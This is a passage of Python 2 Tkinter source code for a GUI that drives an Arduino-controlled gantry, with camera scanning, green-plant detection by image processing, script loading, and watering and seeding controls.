self.btn_StartScan= Tkinter.Button(self.tab_control, text= 'Start Scan', command= self.btn_StartScan_click,font= myfont12_Bold, fg= 'white', activeforeground='white', bg=self.bgGreen, activebackground=self.bgGreen_active, width= btn_width, height= btn_height) self.btn_StartScan.place(x= self.entry_ScanInterval_X.winfo_x()+ gui_vars.interval_x*6, y=self.lbl_ScanAmount.winfo_y()+gui_vars.interval_y*2) self.root.update() # ================================================== # [TAB LOAD SCRIPT] # ================================================== self.lbl_loadscript= Tkinter.Label(self.tab_loadscript, text="[ Load & Run Script ]", font= myfont14) self.lbl_loadscript.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() self.entry_scriptPath= Tkinter.Entry(self.tab_loadscript, font= myfont12, width=25) self.entry_scriptPath.insert(Tkinter.END, self.scriptPath) self.entry_scriptPath.place(x= self.lbl_loadscript.winfo_x(), y= self.lbl_loadscript.winfo_y()+ self.lbl_loadscript.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_choosescript= Tkinter.Button(self.tab_loadscript, text='...', command= self.btn_choosescript_click, font= myfont8, width=0, height=0) self.btn_choosescript.place(x= self.entry_scriptPath.winfo_x()+ self.entry_scriptPath.winfo_reqwidth()+ gui_vars.interval_x, y= self.entry_scriptPath.winfo_y()) self.root.update() self.btn_loadscript= Tkinter.Button(self.tab_loadscript, text='Load', command= self.btn_loadscript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active) self.btn_loadscript.place(x= self.entry_scriptPath.winfo_x(), y= self.entry_scriptPath.winfo_y()+ self.entry_scriptPath.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_savescript= Tkinter.Button(self.tab_loadscript, text='Save', command= self.btn_savescript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= bgGray, activebackground= bgGray_active) 
self.btn_savescript.place(x= self.btn_loadscript.winfo_x()+ self.btn_loadscript.winfo_reqwidth()+ gui_vars.interval_x*2, y= self.btn_loadscript.winfo_y()) self.root.update() self.btn_runscript= Tkinter.Button(self.tab_loadscript, text='RUN', command= self.btn_runscript_click, font= myfont12_Bold, fg= 'white', activeforeground='white', bg= self.bgGreen, activebackground= self.bgGreen_active) self.btn_runscript.place(x= self.btn_savescript.winfo_x()+ self.btn_savescript.winfo_reqwidth()+ gui_vars.interval_x*2, y= self.btn_savescript.winfo_y()) self.btn_runscript.focus_set() self.root.update() #self.txtbox_script = ScrolledText.ScrolledText(self.tab_loadscript, width=40, height= 30 ,font = myfont10, bd = 2, relief = RIDGE, vscrollmode= 'dynamic') self.txtbox_script = Pmw.ScrolledText(self.tab_loadscript, text_width=40, text_height= 20, hscrollmode= 'dynamic', vscrollmode= 'static', text_wrap= 'none', labelpos= 'n', label_text= "NaN")#, rowheader= 1) self.txtbox_script.place(x= self.btn_loadscript.winfo_x(), y= self.btn_loadscript.winfo_y()+ self.btn_loadscript.winfo_reqheight()+ gui_vars.interval_y) # ================================================== # [TAB IMAGE] Image Processing # ================================================== self.btn_saveImg= Tkinter.Button(self.tab_imageprocess, text='Save Image', command= self.btn_saveImg_click,font= myfont14, width= btn_width, height= btn_height) self.btn_saveImg.place(x= gui_vars.interval_x, y= gui_vars.interval_y) self.root.update() self.lbl_scracth_detect= Tkinter.Label(self.tab_imageprocess, text="[ Detect Green Plant ]", font= myfont14) self.lbl_scracth_detect.place(x= gui_vars.interval_x, y= self.btn_saveImg.winfo_y()+ self.btn_saveImg.winfo_reqheight()+ gui_vars.interval_y) self.root.update() self.btn_detect= Tkinter.Button(self.tab_imageprocess, text='Detect', command= self.detectGreenPlant,font= myfont12_Bold, width= btn_width, height= btn_height, fg= 'white',activeforeground='white', bg= bgGray,activebackground= 
bgGray_active) self.btn_detect.place(x= self.lbl_scracth_detect.winfo_x()+ self.lbl_scracth_detect.winfo_reqwidth()+ gui_vars.interval_x, y= self.lbl_scracth_detect.winfo_y()) self.root.update() #============================================= # [group] Plant Index #============================================= self.grp_PlantIndex= Tkinter.LabelFrame(self.tab_imageprocess, text= 'Plant Index', width=Left_width-gui_vars.interval_x*2 ,height=40, relief=Tkinter.RIDGE, padx=0, pady=0)#, font= self.__myfont12_Bold) y_rdbox= self.lbl_scracth_detect.winfo_y()+ self.lbl_scracth_detect.winfo_height()+ gui_vars.interval_y self.lst_PlantIndex_rdbox = list() self.PlantIndex= Tkinter.IntVar() for idx, name in enumerate(gui_vars.rdbox_PlantIndexItem): self.lst_PlantIndex_rdbox.append(Tkinter.Radiobutton(self.grp_PlantIndex, text = name, value=idx, variable = self.PlantIndex, indicatoron=1, command= self.rdbtn_PlantINdex_click)) self.lst_PlantIndex_rdbox[idx].place(x= gui_vars.interval_x+ gui_vars.interval_rdbox*idx, y=0) self.lst_PlantIndex_rdbox[0].select() self.grp_PlantIndex.place(x= gui_vars.interval_x, y=y_rdbox) self.root.update() #============================================= # [group] Binary Method #============================================= self.grp_BinaryMethod= Tkinter.LabelFrame(self.tab_imageprocess, text= 'Binary Method', width=Left_width-gui_vars.interval_x*2 ,height=40, relief=Tkinter.RIDGE, padx=0, pady=0)#, font= self.__myfont12_Bold) self.lst_BinaryMethod_rdbox = list() self.BinaryMethodIndex= Tkinter.IntVar() for idx, name in enumerate(gui_vars.rdbox_BinaryMethodItem): self.lst_BinaryMethod_rdbox.append(Tkinter.Radiobutton(self.grp_BinaryMethod, text = name, value=idx, variable = self.BinaryMethodIndex, indicatoron=1, command= self.rdbtn_BinaryMethodIndex_click)) self.lst_BinaryMethod_rdbox[idx].place(x= gui_vars.interval_x+ (gui_vars.interval_rdbox+9)*idx, y=0) self.lst_BinaryMethod_rdbox[0].select() self.grp_BinaryMethod.place(x= gui_vars.interval_x, 
y=self.grp_PlantIndex.winfo_y()+ self.grp_PlantIndex.winfo_reqheight()+ gui_vars.interval_y*1) self.root.update() self.scale_threshold_graylevel = Tkinter.Scale(self.tab_imageprocess , from_= 0 , to = 255 , orient = Tkinter.HORIZONTAL , label = "Gray_level", font = myfont12, width = 7, length = 300 ) self.scale_threshold_graylevel.set(self.threshold_graylevel) self.scale_threshold_graylevel.place(x= self.grp_BinaryMethod.winfo_x(), y= self.grp_BinaryMethod.winfo_y()+ self.grp_BinaryMethod.winfo_reqheight()+gui_vars.interval_y*2) #self.scale_threshold_graylevel.config(state= 'disabled') self.root.update() self.scale_threshold_MinSize = Tkinter.Scale(self.tab_imageprocess, from_ = 0 , to = 99999 , orient = Tkinter.HORIZONTAL , label = "Min Contour_size", font = myfont12, width = 7, length = 300 ) self.scale_threshold_MinSize.set(self.threshold_MinSize) self.scale_threshold_MinSize.place(x= self.scale_threshold_graylevel.winfo_x(), y= self.scale_threshold_graylevel.winfo_y()+ self.scale_threshold_graylevel.winfo_height()) self.root.update() self.scale_threshold_MaxSize = Tkinter.Scale(self.tab_imageprocess, from_ = 0 , to = 99999 , orient = Tkinter.HORIZONTAL , label = "Max Contour_size", font = myfont12, width = 7, length = 300 ) self.scale_threshold_MaxSize.set(self.threshold_MaxSize) self.scale_threshold_MaxSize.place(x= self.scale_threshold_MinSize.winfo_x(), y= self.scale_threshold_MinSize.winfo_y()+ self.scale_threshold_MinSize.winfo_height()) # ================================================== # [ROOT] Main Image Frame # ================================================== #self.frame_width, self.frame_height= int(0.5*(self.screen_width-Left_width- gui_vars.interval_x*2)), int(0.5*(self.screen_height-self.FileMenu.winfo_reqheight()- self.statuslabel.winfo_reqheight() -gui_vars.interval_y*2)) self.frame_width, self.frame_height= int(0.5*(self.screen_width-Left_width- gui_vars.interval_x*2)), int(0.5*(self.screen_height-self.FileMenu.winfo_reqheight()*0- 
self.statuslabel.winfo_reqheight() -gui_vars.interval_y*1)) print '*** Frame w,h: ',self.frame_width, self.frame_height self.frame= np.zeros((int(self.frame_height), int(self.frame_width),3),np.uint8) #frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) result = Image.fromarray(self.frame) result = ImageTk.PhotoImage(result) self.panel = Tkinter.Label(self.root , image = result) self.panel.image = result self.panel.place(x=Left_width+gui_vars.interval_x, y= 0) self.root.update() # ================================================== # [ROOT] Display merge Image Frame # ================================================== self.mergeframe_width, self.mergeframe_height= self.frame_width, self.frame_height*2+2 self.mergeframe= np.zeros((int(self.mergeframe_height), int(self.mergeframe_width),3),np.uint8) #frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) cv2.putText(self.mergeframe, 'Display Scanning Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) result = Image.fromarray(self.mergeframe) result = ImageTk.PhotoImage(result) self.panel_mergeframe = Tkinter.Label(self.root , image = result) self.panel_mergeframe.image = result self.panel_mergeframe.place(x=self.panel.winfo_x()+ self.panel.winfo_reqwidth(), y= 0) self.root.update() # ================================================== # [ROOT] One Shot Image Frame # ================================================== self.singleframe_width, self.singleframe_height= self.frame_width, self.frame_height self.singleframe= np.zeros((int(self.singleframe_height), int(self.singleframe_width),3),np.uint8) cv2.putText(self.singleframe, '1 shot Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) result = Image.fromarray(self.singleframe) result = ImageTk.PhotoImage(result) self.panel_singleframe = Tkinter.Label(self.root , image = result) self.panel_singleframe.image = result self.panel_singleframe.place(x=self.panel.winfo_x(), 
y= self.panel.winfo_y()+ self.panel.winfo_height()) self.root.update() # ================================================== # Camera & Arduino Connection # ================================================== self.ArdMntr= MonitorThread() self.ArdMntr.start() self.CamMntr= CameraLink(self.CameraID) #self.CamMntr.connect_camera() # ================================================== # Green Plant Indetifier # ================================================== self.plantsArea = PlantIdentifier() # ================================================== # UI callback setting # ================================================== self.panel.after(50, self.check_frame_update) self.lbl_CurrPos.after(5, self.UI_callback) self.statuslabel.after(5, self.check_status) self.panel_mergeframe.bind('<Button-1>',self.mouse_LeftClick) self.root.bind('<F1>',self.rdbtn_MvAmount_click) self.root.bind('<F2>',self.rdbtn_MvAmount_click) self.root.bind('<F3>',self.rdbtn_MvAmount_click) self.root.bind('<F4>',self.rdbtn_MvAmount_click) self.root.bind('<F5>',self.rdbtn_MvAmount_click) #self.root.bind('<Up>',self.btn_MoveUp_click) self.root.bind('<Up>',self.btn_MoveAmount_click) self.root.bind('<Down>',self.btn_MoveAmount_click) self.root.bind('<Left>',self.btn_MoveAmount_click) self.root.bind('<Right>',self.btn_MoveAmount_click) self.root.bind('<Control-Up>',self.btn_MoveAmountZaxis_click) self.root.bind('<Control-Down>',self.btn_MoveAmountZaxis_click) ''' self.root.bind('<Down>',self.btn_MoveDown_click) self.root.bind('<Left>',self.btn_MoveLeft_click) self.root.bind('<Right>',self.btn_MoveRight_click) self.root.bind('<Control-Up>',self.btn_MoveZUp_click) self.root.bind('<Control-Down>',self.btn_MoveZDown_click) ''' # ====== Override CLOSE function ============== self.root.protocol('WM_DELETE_WINDOW',self.on_exit) # ================================================== # Thread # ================================================== self.main_run_judge= True #self.thread_main= threading.Thread(target= 
self.main_run) self.thread_main= class_MyThread.Thread(self.main_run) self.thread_main.start() self.scanning_judge= True #self.thread_scanning= threading.Thread(target= self.scanning_run) #self.thread_scanning= class_MyThread.Thread(self.scanning_run) #self.thread_scanning.start() time.sleep(1) if self.ArdMntr.connect: self.ArdMntr.set_MaxSpeed(self.MaxSpeed[0],'x') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[1],'y') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[2],'z') self.ArdMntr.set_Acceleration(self.Acceleration[0],'x') self.ArdMntr.set_Acceleration(self.Acceleration[1],'y') self.ArdMntr.set_Acceleration(self.Acceleration[2],'z') def store_para(self, arg_filepath, arg_filename): saveDict={} saveDict['thrshd_gray']= self.scale_threshold_graylevel.get() saveDict['thrshd_Minsize']= self.scale_threshold_MinSize.get() saveDict['thrshd_Maxsize']= self.scale_threshold_MaxSize.get() saveDict['Scan_X (Beg,Interval,Amount)']= [int(self.entry_1stXpos.get()), int(self.entry_ScanInterval_X.get()), int(self.entry_ScanAmount_X.get())] saveDict['Scan_Y (Beg,Interval,Amount)']= [int(self.entry_1stYpos.get()), int(self.entry_ScanInterval_Y.get()), int(self.entry_ScanAmount_Y.get())] saveDict['limit Maximum (X,Y)']= self.limit saveDict['Max Speed (X, Y)']= self.MaxSpeed saveDict['Ac/Deceleration (X, Y)']= self.Acceleration saveDict['Camera ID']= self.CameraID saveDict['Peripheral Setting']= self.Peripheral_para saveDict['Move Amount type (5 types)']= self.rdbtnMvAmount_Mode saveDict['script Path']= self.scriptPath self.config.write_json(saveDict) print "Para set" # Override CLOSE function def on_exit(self): #When you click to exit, this function is called if tkMessageBox.askyesno("Exit", "Do you want to quit the application?"): self.store_para(gui_vars.saveParaPath, gui_vars.configName) print 'Close Main Thread...' 
self.main_run_judge= False self.ArdMntr.exit= True self.scanning_judge= False #self.CamMntr.stop_clean_buffer() #del(self.thread_main) self.thread_main.exit() print 'Close Arduino Thread...' #del(self.CamMntr.thread_clean_buffer) #print 'Close Scanning Thread...' #del(self.thread_scanning) print self.MaxSpeed self.CamMntr.release_cap() self.root.destroy() def UI_callback(self): if self.ArdMntr.connect== True: tmp_text= 'Location: (X, Y, Z)= ('+self.ArdMntr.cmd_state.strCurX+', '+self.ArdMntr.cmd_state.strCurY+', '+self.ArdMntr.cmd_state.strCurZ+')' else: tmp_text='Arduino Connection Refuesed!' self.lbl_CurrPos.config(text= tmp_text) self.lbl_CurrPos.after(10,self.UI_callback) def IconResize(self, arg_readPath, arg_zoom=1, arg_subsample= 4): photo_resize=PhotoImage(file=arg_readPath) photo_resize= photo_resize.zoom(arg_zoom) photo_resize= photo_resize.subsample(arg_subsample) return photo_resize def mouse_LeftClick(self, event): if self.checkmouse_panel_mergeframe: mouse_x, mouse_y= event.x, event.y #print '>> mouse(X,Y): ',mouse_x, mouse_y #print '>> split(X,Y): ', self.mergeframe_splitX, self.mergeframe_splitY begX= gui_vars.interval_x begY= self.mergeframe_spaceY tmp_X, tmp_Y= int((mouse_x-begX)/self.mergeframe_splitX), int((mouse_y-begY)/self.mergeframe_splitY) #print '>> RANGE(X,Y): ',begY+ self.mergeframe_splitY*self.scan_Y[2] ,begX+ self.mergeframe_splitX*self.scan_X[2] if begX< mouse_x < begX+ self.mergeframe_splitX*self.scan_Y[2] and begY< mouse_y< begY+ self.mergeframe_splitY*self.scan_X[2]: #print 'tmp_X, tmp_Y= ', tmp_X, ', ', tmp_Y #2018.02.12 if self.readmergeframeIndex == gui_vars.scanIndex: readPath= gui_vars.saveScanningPath #tmp_filename= '{0}_{1}'.format(tmp_Y * self.scan_X[1], tmp_X * self.scan_Y[1]) tmp_filename= '{0}_{1}'.format((self.scan_X[2] - 1 - tmp_Y) * self.scan_X[1], tmp_X * self.scan_Y[1]) #2018.02.12 else: readPath= gui_vars.saveImageProccesPath #tmp_filename= '{0}_{1}'.format(tmp_Y, tmp_X) tmp_filename= 
'{0}_{1}'.format(self.scan_X[2] - 1 - tmp_Y, tmp_X) #2018.02.12 #print 'click file: ', tmp_filename tmp_frame= utils_tool.readImage(readPath+ self.readmergeframeIndex+'_'+self.saveTimeIndex+'_'+tmp_filename+'.jpg') if tmp_frame is not False: self.imagename= self.readmergeframeIndex+'_'+self.saveTimeIndex+tmp_filename self.singleframe= tmp_frame.copy() self.display_panel_singleframe(tmp_frame) mergeframe_canvas= self.mergeframe.copy() cv2.rectangle(mergeframe_canvas,(begX+self.mergeframe_splitX*tmp_X,begY+self.mergeframe_splitY*tmp_Y),(begX+self.mergeframe_splitX*(tmp_X+1), begY+self.mergeframe_splitY*(tmp_Y+1)),(0,255,100),2 ) result = Image.fromarray(mergeframe_canvas) result = ImageTk.PhotoImage(result) self.panel_mergeframe.configure(image = result) self.panel_mergeframe.image = result def check_status(self): self.statuslabel.config(text= self.strStatus) self.statuslabel.after(10,self.check_status) def Lock_Menubar(self, arg_Lock): if arg_Lock: self.menubar.entryconfig('File', state='disabled') self.menubar.entryconfig('Setting', state='disabled') self.menubar.entryconfig('Communication', state='disabled') self.menubar.entryconfig('Image Processing', state='disabled') self.checkmouse_panel_mergeframe= False else: self.menubar.entryconfig('File', state='normal') self.menubar.entryconfig('Setting', state='normal') self.menubar.entryconfig('Communication', state='normal') self.menubar.entryconfig('Image Processing', state='normal') self.checkmouse_panel_mergeframe= True def Lock_tabcontrol(self, arg_Lock): if arg_Lock: self.btn_MoveTo.config(state= 'disabled') self.entry_Xpos.config(state= 'disabled') self.entry_Ypos.config(state= 'disabled') self.entry_Zpos.config(state= 'disabled') self.btn_detect.config(state= 'disabled') self.btn_saveImg.config(state= 'disabled') self.entry_1stXpos.config(state= 'disabled') self.entry_1stYpos.config(state= 'disabled') self.entry_ScanInterval_X.config(state= 'disabled') self.entry_ScanInterval_Y.config(state= 'disabled') 
self.entry_ScanAmount_X.config(state= 'disabled') self.entry_ScanAmount_Y.config(state= 'disabled') self.checkmouse_panel_mergeframe= False self.btn_MoveUp.config(state= 'disabled') self.btn_MoveDown.config(state= 'disabled') self.btn_MoveLeft.config(state= 'disabled') self.btn_MoveRight.config(state= 'disabled') self.btn_MoveZUp.config(state= 'disabled') self.btn_MoveZDown.config(state= 'disabled') self.btn_Water.config(state= 'disabled') self.btn_Seed.config(state= 'disabled') self.btn_CamGrab.config(state= 'disabled') else: self.btn_MoveTo.config(state= 'normal') self.entry_Xpos.config(state= 'normal') self.entry_Ypos.config(state= 'normal') self.entry_Zpos.config(state= 'normal') self.btn_detect.config(state= 'normal') self.btn_saveImg.config(state= 'normal') self.entry_1stXpos.config(state= 'normal') self.entry_1stYpos.config(state= 'normal') self.entry_ScanInterval_X.config(state= 'normal') self.entry_ScanInterval_Y.config(state= 'normal') self.entry_ScanAmount_X.config(state= 'normal') self.entry_ScanAmount_Y.config(state= 'normal') self.checkmouse_panel_mergeframe= True self.btn_MoveUp.config(state= 'normal') self.btn_MoveDown.config(state= 'normal') self.btn_MoveLeft.config(state= 'normal') self.btn_MoveRight.config(state= 'normal') self.btn_MoveZUp.config(state= 'normal') self.btn_MoveZDown.config(state= 'normal') self.btn_Water.config(state= 'normal') self.btn_Seed.config(state= 'normal') self.btn_CamGrab.config(state= 'normal') def Lock_tabloadscript(self, arg_Lock): if arg_Lock: self.entry_scriptPath.config(state= 'disabled') self.btn_loadscript.config(state= 'disabled') self.btn_choosescript.config(state= 'disabled') self.btn_savescript.config(state= 'disabled') self.txtbox_script.configure(text_state= 'disabled') else: self.entry_scriptPath.config(state= 'normal') self.btn_loadscript.config(state= 'normal') self.btn_choosescript.config(state= 'normal') self.btn_savescript.config(state= 'normal') self.txtbox_script.configure(text_state= 'normal') def 
plastic_set_background(self): frame= self.CamMntr.get_frame() self.imageProcessor.set_background(frame) def rdbtn_PlantINdex_click(self): pass def rdbtn_BinaryMethodIndex_click(self): print 'BinaryMethodIndex: ',self.BinaryMethodIndex.get() if self.BinaryMethodIndex.get()==0: self.scale_threshold_graylevel.config(state= 'normal', label='Gray_level', fg='black') else: self.scale_threshold_graylevel.config(state= 'disabled', label='Gray_level (Disable)', fg= 'gray') def detectGreenPlant(self): self.plantsArea.setimage(self.singleframe) if self.PlantIndex.get()==0: _, image_plantIndex,_= self.plantsArea.LABimage(True) elif self.PlantIndex.get()==1: image_plantIndex= self.plantsArea.NDIimage(True) elif self.PlantIndex.get()==2: image_plantIndex= self.plantsArea.ExGimage(True) self.threshold_graylevel= self.scale_threshold_graylevel.get() image_plantIndex_thr= imgProcess_tool.binarialization(image_plantIndex.astype(np.uint8), self.BinaryMethodIndex.get(), self.threshold_graylevel) cv2.imwrite('Debug/img_thr.jpg',image_plantIndex_thr) self.threshold_MinSize, self.threshold_MaxSize=int(self.scale_threshold_MinSize.get()), int(self.scale_threshold_MaxSize.get()) result= imgProcess_tool.findContours(image_plantIndex_thr, self.plantsArea.image_raw, (self.threshold_MinSize, self.threshold_MaxSize),True) #self.singleframe= result_ExG self.display_panel_singleframe(result) self.set_mergeframe_size(2,2) self.reset_mergeframe() self.display_panel_mergeframe(self.singleframe.copy(), 0, 0) self.display_panel_mergeframe(image_plantIndex.astype(np.uint8), 1, 0) self.display_panel_mergeframe(image_plantIndex_thr, 0, 1) self.display_panel_mergeframe(result, 1, 1) self.saveTimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') self.readmergeframeIndex= gui_vars.rdbox_PlantIndexItem[self.PlantIndex.get()] print '=== ', gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex self.saveImg_function(self.singleframe, gui_vars.saveImageProccesPath, 
self.readmergeframeIndex+'_'+self.saveTimeIndex+'_0_0') self.saveImg_function(image_plantIndex.astype(np.uint8), gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_0_1') self.saveImg_function(image_plantIndex_thr, gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_1_0') self.saveImg_function(result, gui_vars.saveImageProccesPath, self.readmergeframeIndex+'_'+self.saveTimeIndex+'_1_1') self.checkmouse_panel_mergeframe= True pass def method_OtsuBinary(self): print 'Start Otsu Binary.... ' ''' self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) result= self.imageProcessor.get_contour(self.singleframe, True, gui_vars.savePath, 'Otsu_Binary_'+self.imagename, 1) ''' self.threshold_MaxSize= int(self.scale_threshold_MaxSize.get()) img_thr= imgProcess_tool.binarialization(self.singleframe, 1) result= imgProcess_tool.findContours(img_thr, self.singleframe, [0,self.threshold_MaxSize] ) self.display_panel_singleframe(result) def method_SimpleBinary(self): print 'rdbtn: ',self.PlantIndex.get() print 'Start Binarization with ... 
' ''' self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) result= self.imageProcessor.get_contour(self.singleframe, True, gui_vars.savePath, 'Simple_Binary_'+self.imagename, 0) ''' self.threshold_MaxSize= int(self.scale_threshold_MaxSize.get()) self.threshold_graylevel= int(self.scale_threshold_graylevel.get()) img_thr= imgProcess_tool.binarialization(self.singleframe, 0, self.threshold_graylevel) result= imgProcess_tool.findContours(img_thr, self.singleframe, [0,self.threshold_MaxSize]) self.display_panel_singleframe(result) def set_ArdConnect(self): self.ArdMntr.connect_serial() def set_CamConnect(self): cameraID= CameraConnection(self.root, self.CamMntr.camera_id) print '*** ',cameraID.result, ', ', self.CamMntr.camera_id if cameraID.result is not None and cameraID.result != self.CamMntr.camera_id: print 'Switch Camera ID' self.CamMntr.connect_camera(cameraID.result) self.CameraID= self.CamMntr.camera_id def set_Peripheral(self): #Var= PeripheralSetting(self.root, [('Fan',8),('Water Pump',9)]) #print '>>> ',self.Peripheral_para Var= PeripheralSetting(self.root, self.Peripheral_para) if Var.result is not None: self.Peripheral_para= Var.result print '*** Return Value: ',Var.result #-2018.02.28-CGH for key, value in self.Peripheral_para: if key.strip().replace(' ','').lower() == 'waterpump': # is -> == 2018.02.28 self.pinNumb_water= value print 'pinNumb_water: ', self.pinNumb_water #2018.02.28 if key.strip().replace(' ','').lower() == 'vaccumpump': # is -> == 2018.02.28 self.pinNumb_seed= value print 'pinNumb_seed: ', self.pinNumb_seed #2018.02.28 if key.strip().replace(' ','').lower() == 'fan': # is -> == 2018.02.28 self.pinNumb_fan= value print 'pinNumb_fan: ', self.pinNumb_fan #2018.02.28 def set_Motor(self): if self.ArdMntr.connect: Var= MotorSetting(self.root, self.MaxSpeed, self.Acceleration) if Var.result is not None: print 'result: ',Var.result 
#self.MaxSpeed= [Var.result[0], Var.result[2]] #self.Acceleration= [Var.result[1], Var.result[3]] self.MaxSpeed= [Var.result[0], Var.result[2], Var.result[4]] self.Acceleration= [Var.result[1], Var.result[3], Var.result[5]] self.ArdMntr.set_MaxSpeed(self.MaxSpeed[0],'x') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[1],'y') self.ArdMntr.set_MaxSpeed(self.MaxSpeed[2],'z') self.ArdMntr.set_Acceleration(self.Acceleration[0],'x') self.ArdMntr.set_Acceleration(self.Acceleration[1],'y') self.ArdMntr.set_Acceleration(self.Acceleration[2],'z') #self.ArdMntr.set_MaxSpeed() else: tkMessageBox.showerror("Error", "Arduino connection refused!\n Please check its connection.") def set_frame(self, frame): self.frame= frame def display_panel_singleframe(self, arg_frame): tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_BGR2RGB) #tmp_frame = self.mark_cross_line(tmp_frame) tmp_frame= cv2.resize(tmp_frame,(self.singleframe_width,self.singleframe_height),interpolation=cv2.INTER_LINEAR) #2018.02.20-??? result = Image.fromarray(tmp_frame) result = ImageTk.PhotoImage(result) self.panel_singleframe.configure(image = result) self.panel_singleframe.image = result def reset_mergeframe(self): self.mergeframe= np.zeros((int(self.mergeframe_height), int(self.mergeframe_width),3),np.uint8) cv2.putText(self.mergeframe, 'Display Scanning Result',(10,20),cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1) def set_mergeframe_size(self, arg_x, arg_y): self.mergeframe_splitX= int((self.mergeframe_width-gui_vars.interval_x*2)/arg_y) self.mergeframe_splitY= int((self.mergeframe_height-100)/arg_x) def display_panel_mergeframe(self, arg_frame, arg_stepX, arg_stepY): print '*** ',len(arg_frame.shape) if len(arg_frame.shape)==3: tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_BGR2RGB) else: tmp_frame= cv2.cvtColor(arg_frame, cv2.COLOR_GRAY2RGB) tmp_frame= cv2.resize(tmp_frame,(self.mergeframe_splitX,self.mergeframe_splitY),interpolation=cv2.INTER_LINEAR) begX= gui_vars.interval_x+self.mergeframe_splitX*arg_stepX begY= 
self.mergeframe_spaceY+ self.mergeframe_splitY* arg_stepY self.mergeframe[begY:begY+ self.mergeframe_splitY, begX: begX+ self.mergeframe_splitX]= tmp_frame #begY= self.mergeframe_height- 50- self.mergeframe_splitY*arg_stepY #self.mergeframe[begY-self.mergeframe_splitY:begY, begX: begX+ self.mergeframe_splitX]= tmp_frame self.mergeframe_stepX= arg_stepX self.mergeframe_stepY= arg_stepY print '>> mergeframe_splitY, splitX= ', self.mergeframe_splitY, ', ', self.mergeframe_splitX print '>> tmp_frame.shape[0,1]= ', tmp_frame.shape[0],', ',tmp_frame.shape[1] result = Image.fromarray(self.mergeframe) result = ImageTk.PhotoImage(result) self.panel_mergeframe.configure(image = result) self.panel_mergeframe.image = result def rdbtn_MvAmount_click(self, event= None): if event is not None: if event.keysym == 'F1': self.rdbtn_MvAmount_1.select() elif event.keysym == 'F2': self.rdbtn_MvAmount_5.select() elif event.keysym == 'F3': self.rdbtn_MvAmount_10.select() elif event.keysym == 'F4': self.rdbtn_MvAmount_50.select() elif event.keysym == 'F5': self.rdbtn_MvAmount_100.select() self.Move_interval= self.MvAmount.get() print 'rdVal',self.Move_interval def btn_MoveAmount_click(self, event= None): #print '*** ',self.tabbox.index(self.tabbox.select()) #print '*** ',self.tabbox.select() if self.tabbox.index(self.tabbox.select())==0: if type(event) is types.StringType: move_type= event else: print'event.keysym ', event.keysym print 'event.keycode', event.keycode move_type= event.keysym print 'Test ',move_type is 'Up' #self.Move_interval= self.MvAmount.get() tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() print '==>>> ',tmp_x, tmp_y, tmp_z print '==>>> ',self.Move_interval*self.Move_intervalUnit if move_type == 'Up': self.ArdMntr.move_Coord(tmp_x+ self.Move_interval*self.Move_intervalUnit, tmp_y, tmp_z) elif move_type == 'Down': self.ArdMntr.move_Coord(tmp_x- self.Move_interval*self.Move_intervalUnit, tmp_y, tmp_z) elif move_type == 'Left': self.ArdMntr.move_Coord(tmp_x, 
tmp_y-self.Move_interval*self.Move_intervalUnit, tmp_z) elif move_type == 'Right': self.ArdMntr.move_Coord(tmp_x, tmp_y+self.Move_interval*self.Move_intervalUnit, tmp_z) def btn_MoveAmountZaxis_click(self, event= None): if self.tabbox.index(self.tabbox.select())==0: if type(event) is types.StringType: move_type= event else: move_type= event.keysym tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() if move_type == 'Up': self.ArdMntr.move_Coord(tmp_x, tmp_y, tmp_z+ self.Move_interval*self.Move_intervalUnit) elif move_type == 'Down': self.ArdMntr.move_Coord(tmp_x, tmp_y, tmp_z- self.Move_interval*self.Move_intervalUnit) def btn_Seed_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Seed(self.pinNumb_seed, not(self.ArdMntr.SeedOn)) print 'Seeding... ' def btn_Water_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Water(self.pinNumb_water,not(self.ArdMntr.WaterOn) , -1) print 'Watering... ' def btn_Light_click(self): if self.ArdMntr.connect: self.ArdMntr.switch_Light(self.pinNumb_fan, not(self.ArdMntr.LightOn)) print 'Lighting... ' #pass-2018.02.12 def btn_choosescript_click(self): str_scriptPath = tkFileDialog.askopenfilename(title = "Select file",filetypes = (("all files","*.*"),("Text File", "*.txt"),("jpeg files","*.jpg"))) print '>>>> ', str_scriptPath if str_scriptPath !="": self.entry_scriptPath.delete(0,"end") self.entry_scriptPath.insert(Tkinter.END, str_scriptPath) self.scriptPath= str_scriptPath def btn_loadscript_click(self): #self.scriptPath= self.entry_scriptPath.get() tmpPath= self.entry_scriptPath.get() if utils_tool.check_file(tmpPath): #self.txtbox_script.delete('1.0', END) self.txtbox_script.clear() self.txtbox_script.importfile(tmpPath) self.txtbox_script.configure(label_text= "- "+ tmpPath.split("/")[-1]+" -") else: tkMessageBox.showerror("Error", "'%s' dost not exist !" 
